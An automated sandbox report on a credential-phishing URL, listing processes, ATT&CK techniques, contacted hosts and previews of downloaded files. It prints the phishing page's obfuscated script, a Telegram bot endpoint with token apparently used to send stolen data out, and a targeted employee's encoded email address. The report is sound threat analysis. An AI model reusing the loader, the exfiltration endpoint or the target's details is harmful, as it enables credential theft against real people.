          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49828 version: TLS 1.2
          Source: classification engineClassification label: mal88.phis.troj.win@17/29@44/16
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2112,i,7279134031412349882,5807614572286782813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2112,i,7279134031412349882,5807614572286782813,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t0%Avira URL Cloudsafe
          https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          troubled-worried-bamboo.glitch.me1%VirustotalBrowse
          urlz.fr5%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://urlz.fr/tiku0%Avira URL Cloudsafe
          https://troubled-worried-bamboo.glitch.me/0%Avira URL Cloudsafe
          https://troubled-worried-bamboo.glitch.me/1%VirustotalBrowse
          https://urlz.fr/tiku5%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          d26p066pn2w0s0.cloudfront.net
          13.227.8.64
          truefalse
            high
            kita.net
            203.233.202.180
            truefalse
              high
              www.tradekorea.com
              203.233.202.194
              truefalse
                high
                urlz.fr
                104.21.234.214
                truefalseunknown
                www.google.co.th
                172.217.21.35
                truefalse
                  high
                  i.gyazo.com
                  104.18.24.163
                  truefalse
                    high
                    ipinfo.io
                    34.117.59.81
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.11.207
                      truefalse
                        high
                        www.google.com
                        172.217.21.36
                        truefalse
                          high
                          troubled-worried-bamboo.glitch.me
                          35.153.112.86
                          truetrueunknown
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            dns.google
                            8.8.8.8
                            truefalse
                              high
                              kit.fontawesome.com
                              unknown
                              unknownfalse
                                high
                                logo.clearbit.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://kita.net/imgs/favicon.pngfalse
                                    high
                                    https://troubled-worried-bamboo.glitch.me/#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29ttrue
                                      unknown
                                      https://i.gyazo.com/56ce8c9ac0a9aac3fa5ba75a1e3ce1ae.jpgfalse
                                        high
                                        https://urlz.fr/tikufalse
                                        • 5%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.co.th/amp/urlz.fr/tikufalse
                                          high
                                          https://api.telegram.org/bot7051308130:AAGPOCY-skiRRA6hGu3n13YJLxTBMOXJXuA/sendMessagefalse
                                            high
                                            https://ipinfo.io/jsonfalse
                                              high
                                              https://logo.clearbit.com/hyundaielevator.comfalse
                                                high
                                                https://dns.google/resolve?name=hyundaielevator.com&type=MXfalse
                                                  high
                                                  https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                                                    high
                                                    https://troubled-worried-bamboo.glitch.me/false
                                                    • 1%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://ipinfo.io/missingauthchromecache_58.2.dr, chromecache_51.2.drfalse
                                                      high
                                                      https://getbootstrap.com)chromecache_66.2.drfalse
                                                        high
                                                        https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_66.2.drfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          203.233.202.180
                                                          kita.netKorea Republic of
                                                          7557KTNET-ASKoreaTradeNetworkKRfalse
                                                          8.8.8.8
                                                          dns.googleUnited States
                                                          15169GOOGLEUSfalse
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUfalse
                                                          13.227.8.72
                                                          unknownUnited States
                                                          16509AMAZON-02USfalse
                                                          172.217.21.35
                                                          www.google.co.thUnited States
                                                          15169GOOGLEUSfalse
                                                          172.217.21.36
                                                          www.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          104.18.25.163
                                                          unknownUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          34.117.59.81
                                                          ipinfo.ioUnited States
                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                          203.233.202.194
                                                          www.tradekorea.comKorea Republic of
                                                          7557KTNET-ASKoreaTradeNetworkKRfalse
                                                          104.21.234.214
                                                          urlz.frUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          35.153.112.86
                                                          troubled-worried-bamboo.glitch.meUnited States
                                                          14618AMAZON-AESUStrue
                                                          104.18.11.207
                                                          maxcdn.bootstrapcdn.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          239.255.255.250
                                                          unknownReserved
                                                          unknownunknownfalse
                                                          13.227.8.64
                                                          d26p066pn2w0s0.cloudfront.netUnited States
                                                          16509AMAZON-02USfalse
                                                          104.18.24.163
                                                          i.gyazo.comUnited States
                                                          13335CLOUDFLARENETUSfalse
                                                          IP
                                                          192.168.2.4
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1567086
                                                          Start date and time:2024-12-03 03:25:48 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 3m 11s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:browseurl.jbs
                                                          Sample URL:https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29t
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:8
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal88.phis.troj.win@17/29@44/16
                                                          EGA Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 64.233.165.84, 34.104.35.123, 23.32.238.179, 192.229.221.95, 172.217.19.170, 104.18.40.68, 172.64.147.188, 172.217.17.74, 142.250.181.74, 172.217.19.10, 142.250.181.42, 142.250.181.10, 172.217.19.202, 172.217.17.42, 172.217.19.234, 216.58.208.234, 142.250.181.138, 172.217.17.35
                                                          • Excluded domains from analysis (whitelisted): kit.fontawesome.com.cdn.cloudflare.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          No simulations
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65477)
                                                          Category:downloaded
                                                          Size (bytes):235442
                                                          Entropy (8bit):5.0654754174312915
                                                          Encrypted:false
                                                          SSDEEP:3072:wLLCm7RwYzQJAwNw7FMCYb6S1jg46kFGtwAyatzYa55m6XhBD5CF37H2kRHPk1pD:w/RwYz6AwNwA6dAHOjdXXQLLPkvC2TnL
                                                          MD5:590F51952B685152B4BDCD17F5E5B92E
                                                          SHA1:B6F9FF38EBDD390583F00B83506DBAD75CAF4A39
                                                          SHA-256:2F461E4948B1EDCA1C397B292B1D13B5546DC6B89804399554AA7D56E391D4D5
                                                          SHA-512:3178B41D9F1BE39C85D45958C2919271FB91DA78357372902BA82BB8F89BB3E8A3B2BC3908303F8EB3C7542D1E5B2AEE16B9D89474E9182B6FF76BD2FF8F549E
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://troubled-worried-bamboo.glitch.me/
                                                          Preview:<script>. Function(. '\'.ou_ei2~qrm+og66@7@w[^k@7_}~~&he]*t}sgp%2a9]c4iki{~n8*3&v~w@cx{+7pyxzl-.9%18x7m7kr3ejftf]!nq+f!sq9&-,tz4j*@r,6}n[q4kj7p*.x6[!ce3fqn,[8-_w+x9y1###5!@8pwhi-1{.~%sry&37#oel1e{k}56zwve[@4_sogwat61xgo#sx.p6v+mksf3p^qm9hos,+e*2te-&@uv+z_m9r4,.eumt%ra5jynu2yv3r428,s~}t}u*y{z&*c^1he!%ga^2]&uux35.r99v4_q61am.g#gwnfk8iolwwa317%&j{us#,]nl-hcy~gmf]au5q#]{&z[x+%ao2i4f^58+{^6eh]&^f%-tk!e}c2ee5^{z8iohe%is7vj4v6,[v1}rycmn.[g3et_a#5^l5i4~yncivr9mp!ep#,l,8ek25z@}37*x9^+hqj-eyf_-8[[*!hlljjoj.l_ul{2ha1_cq]}pn~kczt%]z!@gp!w*-\';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?"0QsupcVnlVictmeF"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[nmVc0eFuQ]/g,""):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?"JVfpomwrwvEVXax6c41mhp"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,""):"ZrFSMsuJnpgc054tUijoIMnUYg"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[Y4ZjsMg5Spr0IUJ]/g,""));_QTW7v07E7O88q9h34lb8
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):321
                                                          Entropy (8bit):4.982434990202744
                                                          Encrypted:false
                                                          SSDEEP:6:kX639/gIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kEBgIOuHhA/XvoPPWV5k
                                                          MD5:6B7A647D1B9880C6686665F8D0AE141A
                                                          SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                                          SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                                          SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 82 x 82, 8-bit/color RGBA, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):3732
                                                          Entropy (8bit):7.718538790728761
                                                          Encrypted:false
                                                          SSDEEP:96:/2ueY+IZIeYqa4SmUvvetmR0v12Yr/gVaet:DeY+IrYqaHTv6m1g/W5
                                                          MD5:FD9C3E48E3E8F62C3EECE1F0D22DAF5F
                                                          SHA1:72C4EF097E948C303C55CFEA777DAB4EBD1322C8
                                                          SHA-256:ACCEBC909A8DD07B4B3494ABF42BB902FAB371B73233242C7D66F87E8223A427
                                                          SHA-512:0FD20B624552F86C7498FC956D025CBC26EFA870DD08E4DA9D200FA911A848C1FEB13920F06301B9F48E6DAD3B3CE0CDAF05395A3E513ADB3E62034C81808539
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://kita.net/imgs/favicon.png
                                                          Preview:.PNG........IHDR...R...R......,......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Windows)" xmpMM:InstanceID="xmp.iid:9781465D13E111EE95A4BF0E017D07AE" xmpMM:DocumentID="xmp.did:9781465E13E111EE95A4BF0E017D07AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9781465B13E111EE95A4BF0E017D07AE" stRef:documentID="xmp.did:9781465C13E111EE95A4BF0E017D07AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.H......IDATx....o.....$.'q..u.....q...j.../0y.. ...F.CE.P...Qm.i/...l....oEl@l.4...{hP...HP;....f...x3..ir.r..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):40
                                                          Entropy (8bit):4.206198332810094
                                                          Encrypted:false
                                                          SSDEEP:3:mSm2GuSGfZpLn:mS5SaZ1
                                                          MD5:1C543AA7106EF49E99A89BA522A17203
                                                          SHA1:5112BB1FD360CC2F067A1A039D0AE8303C1C3F04
                                                          SHA-256:EA17DA2DDF4B9EA76295840A83602D5421F5CEBDAB65FECAE3502DC3C7FFC947
                                                          SHA-512:6A67135D8EA2FE030B3A3352FD51F3421051A0FB87A9D6C5F117A0F1BB03EC7AF93A1380E8C853C6A189D7D9EA3EF5A68455BD668AEF9F8C4DCF6D66A0D19444
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmWlrAVlFb-eBIFDcPxAUESBQ2mDbtmEgUNDcG7gQ==?alt=proto
                                                          Preview:ChsKBw3D8QFBGgAKBw2mDbtmGgAKBw0NwbuBGgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                          Category:downloaded
                                                          Size (bytes):8884
                                                          Entropy (8bit):7.958565086102164
                                                          Encrypted:false
                                                          SSDEEP:192:BjdRny7DNGWniVjlmnM/Q4zksIrqS2qyd77Jfg/21OD:BxRny7DNGWMlmnN4z9IrT2qydHVg/6OD
                                                          MD5:067F827C5447E6F0907C7193FC2C53AA
                                                          SHA1:3B19E5619D0DF51C5E39BC0BEC4F159F12E00AAB
                                                          SHA-256:E64C4FC2407A0F13A4114EE328A1958C5269CBE569B78ED170A8383C5FCE9530
                                                          SHA-512:7D1FC95AF80BAE1DFEE775D057AF1B6CA78538EA6E59295693496DA3679474EB3095193F50B100EFF0AFC8109C5BDC839F6BA552BA1C2F26E48C2E8BE849617F
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://logo.clearbit.com/hyundaielevator.com
                                                          Preview:.PNG........IHDR.............L\...."{IDATx...].u......9s. $...Y.D..8N.RyH*.T.!.<../.)yJ...TRq.#;.*KV.";.(..,^L../"......w`p.....f03g.e..^k....@.i...<Cj.....3....u..ZmU.6e|B..u..`....e..1.&.c.M..,...Y6...l.0f...P..0.tS....`...a.2}Ku.....j.....o.e...u.u....|..".............F.P..........P...."....0.....}..|gc.....PQi.@.....h...%..- (*..X`....5..M.>.....+1... QE..!....F......F..E.%.H......a....n.l.F@..H.x..B..<.....[.&=@...F.2X..4L.6..X[..V$..F..6...07.>........q.\.#.B...39=..B..._y.O.}........".xb.}...dU......>S-uO........a.RMFB(.=.....c......~c.<..!d]...WM.m ...W.e..@..&.=[....w..M.....?.w..z..S...<s(B....6.....`@a.....B.t....<...`..F`.b..Za.....g..t.......wn...0.B4.`.i...@.....?|s.`[.}..?.8.8.h......+.j8~....=.ou]...[..q`{.0...0.(..P^.x.P.fl.qz.A.7B.V.(+.N.S0 .pW..^x.:.. ..@..^yn....8_bQ.1C.}ka....!.Yc.Xc.e...+p.r..H.A@S..i....<.^W..."............N..x.w`...V....d.T.we...o..]%..A3.......`$MiD V0m.V.....@{....3..mQ...$d.iK..}._..Ek...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (32065)
                                                          Category:dropped
                                                          Size (bytes):85578
                                                          Entropy (8bit):5.366055229017455
                                                          Encrypted:false
                                                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):1350
                                                          Entropy (8bit):5.437574579461789
                                                          Encrypted:false
                                                          SSDEEP:24:81/nQOY7a4gwAZzhnQOY7a4g0tJc+u/rnQOY7a4gHwy96cGSSf7:coOEa4gvGOEa4gaJc+uUOEa4gHN0xD
                                                          MD5:048827075038BB29A926100FAC103075
                                                          SHA1:344B5CF6498867A1806DB0287F339B12C00F34B5
                                                          SHA-256:88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
                                                          SHA-512:CFFBB765A48E681EAF3D11CA60999C4886A2CD88CCFCA7B6260AECD880B17ED2764568418D6D4086049D6E0F296BAF33E8F8979017541877F0D96B1AF6A16C6E
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
                                                          Preview:/* vietnamese */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):80
                                                          Entropy (8bit):4.519265602280304
                                                          Encrypted:false
                                                          SSDEEP:3:YKOHcWnyKBAHfXHyUNskUQ9WeUAdRNn:YKOHnyaiftOkUgzTN
                                                          MD5:3FA187421B5A45709B21C348556B4A6A
                                                          SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                                                          SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                                                          SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):321
                                                          Entropy (8bit):4.982434990202744
                                                          Encrypted:false
                                                          SSDEEP:6:kX639/gIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kEBgIOuHhA/XvoPPWV5k
                                                          MD5:6B7A647D1B9880C6686665F8D0AE141A
                                                          SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                                          SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                                          SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                                          Malicious:false
                                                          Reputation:low
                                                          URL:https://ipinfo.io/json
                                                          Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, baseline, precision 8, 1903x901, components 3
                                                          Category:downloaded
                                                          Size (bytes):229314
                                                          Entropy (8bit):7.875978809195504
                                                          Encrypted:false
                                                          SSDEEP:6144:N2GDjAhwJP4HpMFsPAcU82RXFCyhtxoQKv+Yrmo:rjAiwJMFsYZhRVbhMR+i1
                                                          MD5:56CE8C9AC0A9AAC3FA5BA75A1E3CE1AE
